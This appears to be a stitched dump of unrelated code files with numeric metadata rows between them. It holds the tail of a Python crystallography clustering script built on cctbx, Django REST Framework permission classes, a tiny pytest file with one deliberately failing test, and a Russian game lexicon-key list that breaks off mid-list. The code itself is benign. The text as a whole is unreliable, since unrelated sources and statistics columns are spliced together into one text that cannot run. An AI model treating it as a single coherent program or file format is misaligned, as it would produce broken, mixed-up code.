        adiag3 = self.diagonalCell(c1, a1, be1)
        bdiag1 = self.diagonalCell(a2, b2, ga2)
        bdiag2 = self.diagonalCell(b2, c2, al2)
        bdiag3 = self.diagonalCell(c2, a2, be2)
        # Calculate the LCV (also fixes min(adiag3, bdiag2) typo).
        LCV = [fabs(adiag1-bdiag1)/min(adiag1, bdiag1),
               fabs(adiag2-bdiag2)/min(adiag2, bdiag2),
               fabs(adiag3-bdiag3)/min(adiag3, bdiag3)]
        return gen1.__next__(), gen2.__next__(), max(LCV)
    def cellSerial(self):
        """
        Serially compute all pairwise LCV distances, logging each one.

        Returns:
            list: (index1, index2, distance) triples. BUG FIX: the
            original returned None, so self.results broke writeLog().
        """
        results = []
        print('Correlation coefficients', file=self.LogFile)
        for x in itertools.combinations(self.Arrays, 2):
            a, b, cc = self.blendLCV(x)
            print('%s %s %s'%(a, b, cc), file=self.LogFile)
            results.append((a, b, cc))
        return results
class commonList():
    """
    EXPERIMENTAL CODE!!!!! Do not use.
    Calculate pairwise distances from the number of common reflections
    between the datasets named in an explicit list of input files.
    """
    def __init__(self, Arglist):
        self.LogFile = open('Common.txt', 'w')
        self.CurrentDir = os.getcwd()
        self.argList = Arglist
        self.Arrays = self.loadReflections()
        self.results = self.calcSerial()
    def loadReflections(self):
        """
        Load each input file (INTEGRATE.HKL via the XDS reader, anything
        else via cctbx); returns {filename: miller arrays}.
        """
        Arrays = {}
        for x in self.argList:
            if reader.is_integrate_hkl_file(x):
                Arrays[x] = reader().as_miller_arrays(x)
            else:
                hklFile = any_reflection_file(x)
                Arrays[x] = hklFile.as_miller_arrays()
            print('File %s has been loaded'%(x))
        # Write the label section of the log file.
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        return Arrays
    def writeLog(self):
        """
        Write labels and the distance matrix to the log file.
        """
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        print('Correlation coefficients', file=self.LogFile)
        for L in self.results:
            print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
    def ccPrint(self, arglist):
        """
        Distance between two input files based on the size of their
        common reflection set (smaller overlap = larger distance).

        Returns:
            tuple: (index of file 1, index of file 2, 1000/common)
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        # Use the first X-ray intensity array found in each file.
        for x in Array1:
            if x.is_xray_intensity_array():
                I_obs1 = x
                break
        for x in Array2:
            if x.is_xray_intensity_array():
                I_obs2 = x
                break
        I_ext1 = I_obs1.generate_bijvoet_mates()
        I_ext2 = I_obs2.generate_bijvoet_mates()
        try:
            ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry=True)
            common = ExtCommon1.size()
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        except Exception:
            common = 0
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        # BUG FIX: the original divided by zero when common == 0; treat
        # "no common reflections" as an infinite distance instead.
        distance = 1000/common if common else float('inf')
        return gen1.__next__(), gen2.__next__(), distance
    def calcSerial(self):
        """
        Serially compute all pairwise distances, logging each one.

        Returns:
            list: (index1, index2, distance) triples. BUG FIX: the
            original returned None, so self.results broke writeLog().
        """
        results = []
        print('Correlation coefficients', file=self.LogFile)
        for x in itertools.combinations(self.Arrays, 2):
            a, b, cc = self.ccPrint(x)
            print('%s %s %s'%(a, b, cc), file=self.LogFile)
            results.append((a, b, cc))
        return results
    def calcAll(self):
        """
        Parallel version of calcSerial using 4 worker processes.
        """
        # BUG FIX: `Pool` was referenced unqualified but only the
        # `multiprocessing` module is imported.
        proc = multiprocessing.Pool(4)
        a, b, cc = zip(*proc.map(self.ccPrint, itertools.combinations(self.Arrays, 2)))
        L = zip(a, b, cc)
        return L
def main():
    """
    Command-line entry point: pick the clustering metric from the flags
    and run the corresponding calculator.

    -f: explicit list of input files (otherwise the cwd tree is walked)
    -u: unit-cell-based distance
    -c: experimental common-reflections distance
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-f", dest="structures", default=None, type=str, nargs='+', help='The list of refined structures to merge')
    parser.add_argument("-u", dest="cell", default=False, action="store_true", help='Unit cell based clustering. requires list of input files')
    parser.add_argument("-c", dest="common", default=False, action="store_true", help='Experimental class based on common reflections only')
    args = parser.parse_args()
    CurrentDir = os.getcwd()
    if args.structures is None:
        if args.cell:
            print('No input specified, calculating cell distance')
            print('this might take a while')
            # BUG FIX: this branch ran ccCalc() despite announcing a cell
            # distance and pointing at cellClusterLog.txt, which only
            # cellCalc writes.
            cellCalc()
            correlationFile = 'cellClusterLog.txt'
        else:
            print('No input specified, calculating Correlation coefficients')
            print('this might take a while')
            ccCalc()
            correlationFile = 'ccClusterLog.txt'
    elif args.cell:
        print("Calculating unit cell distance between specified files")
        cellList(args.structures)
        correlationFile = 'cellClusterLog.txt'
    elif args.common:
        print('Warning! I am using the experimental common reflections feature!')
        commonList(args.structures)
        correlationFile = 'Common.txt'
    else:
        print("Calculating CC between specified files")
        ccList(args.structures)
        correlationFile = 'ccClusterLog.txt'
    # NOTE(review): a large commented-out block from an older
    # multiprocessing-based version was removed here; recover it from
    # version control history if it is ever needed again.
if __name__ == '__main__':
    main()
| 35.585761
| 146
| 0.583303
| 2,887
| 21,992
| 4.320402
| 0.104953
| 0.047623
| 0.057725
| 0.049387
| 0.803816
| 0.780085
| 0.758278
| 0.756674
| 0.749459
| 0.747695
| 0
| 0.031073
| 0.285877
| 21,992
| 617
| 147
| 35.643436
| 0.763133
| 0.110813
| 0
| 0.82904
| 0
| 0
| 0.106545
| 0.001249
| 0.002342
| 0
| 0
| 0
| 0.016393
| 1
| 0.086651
| false
| 0
| 0.025761
| 0
| 0.168618
| 0.163934
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52eb92c85e3ad3fe38f04d132961178213c87ef9
| 3,310
|
py
|
Python
|
apps/api/permissions.py
|
wilfredinni/merken
|
f15f168f58e9391fcafeeda7ad17232fffab2a14
|
[
"MIT"
] | 5
|
2020-05-06T03:34:07.000Z
|
2022-03-25T10:05:30.000Z
|
apps/api/permissions.py
|
MaxCodeXTC/merken
|
040515e43dcc9bdcf23f51ea15b49b4d2af64964
|
[
"MIT"
] | 17
|
2019-08-28T22:10:47.000Z
|
2021-06-09T18:19:00.000Z
|
apps/api/permissions.py
|
MaxCodeXTC/merken
|
040515e43dcc9bdcf23f51ea15b49b4d2af64964
|
[
"MIT"
] | 1
|
2020-06-15T08:34:16.000Z
|
2020-06-15T08:34:16.000Z
|
from rest_framework import permissions
class IsAdminOrReadOnly(permissions.BasePermission):
    """
    Allow read-only access to everyone; restrict writes to staff users.
    """

    def has_permission(self, request, view):
        # Safe (read) methods — GET, HEAD, OPTIONS — are always allowed;
        # anything else requires a staff account.
        if request.method not in permissions.SAFE_METHODS:
            return request.user.is_staff
        return True
class IsSameUserOrReadOnly(permissions.BasePermission):
    """
    Allow read access to anyone; restrict writes to the user the object
    belongs to.
    """

    def has_object_permission(self, request, view, obj):
        # GET, HEAD and OPTIONS requests are always permitted.
        if request.method not in permissions.SAFE_METHODS:
            # Writes only when the object is the requesting user's own.
            return obj.username == request.user.username
        return True
class IsAuthorOrReadOnly(permissions.BasePermission):
    """
    Permission that lets anyone read an article, but only its author edit it.
    """

    def has_object_permission(self, request, view, obj):
        # GET, HEAD and OPTIONS are read-only and open to every request.
        is_read_request = request.method in permissions.SAFE_METHODS
        # Writes are permitted only to the article's author.
        return is_read_request or obj.author == request.user
class IsAuthorOrAdminOrReadOnly(permissions.BasePermission):
    """
    Permission that lets anyone read an article, while edits are reserved
    for the article's author or admin (staff) users.
    """

    def has_object_permission(self, request, view, obj):
        # Staff members may do anything; safe methods are open to everyone.
        if request.user.is_staff or request.method in permissions.SAFE_METHODS:
            return True
        # Remaining (write) requests must come from the article's author.
        return obj.author == request.user
class IsOwnerOrAdminOrReadOnly(permissions.BasePermission):
    """
    Permission that lets anyone read, while edits are reserved for the
    object's owner (matched by username). Admin users have full access.
    """

    def has_object_permission(self, request, view, obj):
        # Staff members may do anything; safe methods are open to everyone.
        if request.user.is_staff or request.method in permissions.SAFE_METHODS:
            return True
        # Remaining (write) requests must come from the profile's owner.
        return obj.username == request.user.username
class IsOwnerOrAdmin(permissions.BasePermission):
    """
    Permission restricted to the object's owner (matched by username).
    Admin users have full access; there is no read-only fallback.
    """

    def has_object_permission(self, request, view, obj):
        # Staff bypass ownership entirely; otherwise the requester
        # must own the profile being accessed.
        return True if request.user.is_staff \
            else obj.username == request.user.username
| 32.772277
| 78
| 0.679758
| 415
| 3,310
| 5.371084
| 0.183133
| 0.044415
| 0.083445
| 0.110363
| 0.847914
| 0.828623
| 0.828623
| 0.784657
| 0.76716
| 0.76716
| 0
| 0
| 0.261934
| 3,310
| 100
| 79
| 33.1
| 0.912403
| 0.42719
| 0
| 0.742857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171429
| false
| 0
| 0.028571
| 0
| 0.771429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
ead5f5f894aa2d5ed5b4703c6984737aeff1f723
| 107
|
py
|
Python
|
test_nicedice.py
|
EavesofIT/nicediceroller
|
c5d963dd967f0e481595ee24c82bbc8030f1caa7
|
[
"MIT"
] | null | null | null |
test_nicedice.py
|
EavesofIT/nicediceroller
|
c5d963dd967f0e481595ee24c82bbc8030f1caa7
|
[
"MIT"
] | null | null | null |
test_nicedice.py
|
EavesofIT/nicediceroller
|
c5d963dd967f0e481595ee24c82bbc8030f1caa7
|
[
"MIT"
] | null | null | null |
# test_with_pytest.py
def test_always_passes():
    """Smoke test that can never fail; confirms pytest discovery and execution."""
    assert True
def test_always_fails():
assert False
| 15.285714
| 25
| 0.747664
| 16
| 107
| 4.625
| 0.6875
| 0.189189
| 0.351351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17757
| 107
| 7
| 26
| 15.285714
| 0.840909
| 0.17757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0.25
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d827a731cead8fb1a0d85a92e57abcf3e4c2fb7b
| 16,484
|
py
|
Python
|
src/the_tale/the_tale/linguistics/lexicon/groups/jobs.py
|
al-arz/the-tale
|
542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5
|
[
"BSD-3-Clause"
] | 85
|
2017-11-21T12:22:02.000Z
|
2022-03-27T23:07:17.000Z
|
src/the_tale/the_tale/linguistics/lexicon/groups/jobs.py
|
al-arz/the-tale
|
542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5
|
[
"BSD-3-Clause"
] | 545
|
2017-11-04T14:15:04.000Z
|
2022-03-27T14:19:27.000Z
|
src/the_tale/the_tale/linguistics/lexicon/groups/jobs.py
|
al-arz/the-tale
|
542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5
|
[
"BSD-3-Clause"
] | 45
|
2017-11-11T12:36:30.000Z
|
2022-02-25T06:10:44.000Z
|
import smart_imports
smart_imports.all()
# Short alias for the lexicon variable enum used in every KEYS entry below.
# NOTE(review): lexicon_relations and relations are injected by
# smart_imports.all() above — TODO confirm their concrete modules.
V = lexicon_relations.VARIABLE
# Lexicon key declarations for "jobs" messages (work performed by a master).
# Each entry is a 6-tuple:
#   (key name, numeric id, editor caption, lexicon group,
#    description, template variables available, attachment hint or None)
# The captions/descriptions are Russian UI strings and must stay verbatim.
# NOTE(review): the trailing hint (e.g. 'hero#N +coins#G') appears to describe
# template attributes consumed by the linguistics engine — verify semantics.
KEYS = [
('JOB_NAME_PERSON_PLACE_PRODUCTION', 620009, 'Название: выполняется мастером, эффект: «производство»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «производство»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_SAFETY', 620010, 'Название: выполняется мастером, эффект: «безопасность»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «безопасность»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_TRANSPORT', 620011, 'Название: выполняется мастером, эффект: «транспорт»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «транспорт»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_FREEDOM', 620012, 'Название: выполняется мастером, эффект: «свобода»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «свобода»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_STABILITY', 620013, 'Название: выполняется мастером, эффект: «стабильность»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «стабильность»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_MONEY', 620014, 'Название: выполняется мастером, эффект: «золото ближнему кругу»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «золото ближнему кругу»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_ARTIFACT', 620015, 'Название: выполняется мастером, эффект: «артефакт ближнему кругу»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «артефакт ближнему кругу»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_EXPERIENCE', 620016, 'Название: выполняется мастером, эффект: «опыт ближнему кругу»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «опыт ближнему кругу»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_CARDS', 620017, 'Название: выполняется мастером, эффект: «карты судьбы»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «карты судьбы»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
# Diary entries: ids 620054+ follow the pattern
# JOB_DIARY_PERSON_<target>_<effect>_<POSITIVE|NEGATIVE>_<FRIENDS|ENEMIES>.
('JOB_DIARY_PERSON_PLACE_PRODUCTION_POSITIVE_FRIENDS', 620054, 'Дневник: работа выполнена мастером успешно, эффект: «производство», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «производство», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_POSITIVE_ENEMIES', 620055, 'Дневник: работа выполнена мастером успешно, эффект: «производство», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «производство», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_NEGATIVE_FRIENDS', 620056, 'Дневник: работа выполнена мастером не успешно, эффект: «производство», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «производство», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_NEGATIVE_ENEMIES', 620057, 'Дневник: работа выполнена мастером не успешно, эффект: «производство», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «производство», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_POSITIVE_FRIENDS', 620058, 'Дневник: работа выполнена мастером успешно, эффект: «безопасность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «безопасность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_POSITIVE_ENEMIES', 620059, 'Дневник: работа выполнена мастером успешно, эффект: «безопасность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «безопасность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_NEGATIVE_FRIENDS', 620060, 'Дневник: работа выполнена мастером не успешно, эффект: «безопасность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «безопасность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_NEGATIVE_ENEMIES', 620061, 'Дневник: работа выполнена мастером не успешно, эффект: «безопасность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «безопасность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_POSITIVE_FRIENDS', 620062, 'Дневник: работа выполнена мастером успешно, эффект: «транспорт», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «транспорт», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_POSITIVE_ENEMIES', 620063, 'Дневник: работа выполнена мастером успешно, эффект: «транспорт», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «транспорт», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_NEGATIVE_FRIENDS', 620064, 'Дневник: работа выполнена мастером не успешно, эффект: «транспорт», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «транспорт», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_NEGATIVE_ENEMIES', 620065, 'Дневник: работа выполнена мастером не успешно, эффект: «транспорт», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «транспорт», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_POSITIVE_FRIENDS', 620066, 'Дневник: работа выполнена мастером успешно, эффект: «свобода», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «свобода», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_POSITIVE_ENEMIES', 620067, 'Дневник: работа выполнена мастером успешно, эффект: «свобода», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «свобода», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_NEGATIVE_FRIENDS', 620068, 'Дневник: работа выполнена мастером не успешно, эффект: «свобода», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «свобода», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_NEGATIVE_ENEMIES', 620069, 'Дневник: работа выполнена мастером не успешно, эффект: «свобода», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «свобода», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_POSITIVE_FRIENDS', 620070, 'Дневник: работа выполнена мастером успешно, эффект: «стабильность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «стабильность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_POSITIVE_ENEMIES', 620071, 'Дневник: работа выполнена мастером успешно, эффект: «стабильность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «стабильность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_NEGATIVE_FRIENDS', 620072, 'Дневник: работа выполнена мастером не успешно, эффект: «стабильность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «стабильность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_NEGATIVE_ENEMIES', 620073, 'Дневник: работа выполнена мастером не успешно, эффект: «стабильность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «стабильность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_MONEY_POSITIVE_FRIENDS', 620074, 'Дневник: работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.COINS], 'hero#N +coins#G'),
('JOB_DIARY_PERSON_HERO_MONEY_POSITIVE_ENEMIES', 620075, 'Дневник: работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_MONEY_NEGATIVE_FRIENDS', 620076, 'Дневник: работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_MONEY_NEGATIVE_ENEMIES', 620077, 'Дневник: работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.COINS], 'hero#N +coins#G'),
('JOB_DIARY_PERSON_HERO_ARTIFACT_POSITIVE_FRIENDS', 620078, 'Дневник: работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.ARTIFACT], None),
('JOB_DIARY_PERSON_HERO_ARTIFACT_POSITIVE_ENEMIES', 620079, 'Дневник: работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_ARTIFACT_NEGATIVE_FRIENDS', 620080, 'Дневник: работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_ARTIFACT_NEGATIVE_ENEMIES', 620081, 'Дневник: работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.ARTIFACT], None),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_POSITIVE_FRIENDS', 620082, 'Дневник: работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.EXPERIENCE], 'hero#N +experience#EXP'),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_POSITIVE_ENEMIES', 620083, 'Дневник: работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_NEGATIVE_FRIENDS', 620084, 'Дневник: работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_NEGATIVE_ENEMIES', 620085, 'Дневник: работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.EXPERIENCE], 'hero#N +experience#EXP'),
('JOB_DIARY_PERSON_HERO_CARDS_POSITIVE_FRIENDS', 620086, 'Дневник: работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], 'hero#N'),
('JOB_DIARY_PERSON_HERO_CARDS_POSITIVE_ENEMIES', 620087, 'Дневник: работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_CARDS_NEGATIVE_FRIENDS', 620088, 'Дневник: работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_CARDS_NEGATIVE_ENEMIES', 620089, 'Дневник: работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], 'hero#N'),
# «Culture» effect entries (added later: ids 620091, 620096-620099).
('JOB_NAME_PERSON_PLACE_CULTURE', 620091, 'Название: выполняется мастером, эффект: «культура»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «культура»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_POSITIVE_FRIENDS', 620096, 'Дневник: работа выполнена мастером успешно, эффект: «культура», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «культура», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_POSITIVE_ENEMIES', 620097, 'Дневник: работа выполнена мастером успешно, эффект: «культура», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «культура», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_NEGATIVE_FRIENDS', 620098, 'Дневник: работа выполнена мастером не успешно, эффект: «культура», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «культура», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
